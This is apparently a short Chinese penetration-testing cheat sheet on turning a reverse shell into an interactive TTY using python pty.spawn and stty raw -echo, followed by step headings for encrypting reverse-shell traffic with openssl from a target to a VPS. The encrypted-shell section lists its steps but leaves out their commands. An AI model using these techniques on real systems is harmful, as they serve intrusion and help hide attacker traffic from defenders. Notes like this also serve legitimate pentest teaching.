利用stty反弹一个交互shell & 加密反弹shell流量
stty 打印或更改terminal(终端)的设置
Linux stty 命令用法详解
流程:
先反弹一个shell出来
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z退出后在用stty修改tty通信
$ stty raw -echo #设置原始输入禁止回显,当您在键盘上输入时,并不出现在屏幕上
$ fg #返回shell中
$ reset
$ export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104第一步,在VPS 上生成 SSL 证书的公钥/私钥对:
第二步,VPS 监听反弹 shell:
第三步,目标上用 openssl 加密反弹 shell 的流量:
第四步,VPS 上成功获取加密的哑 shell:
https://www.4hou.com/technology/6248.html
https://www.freebuf.com/vuls/211847.html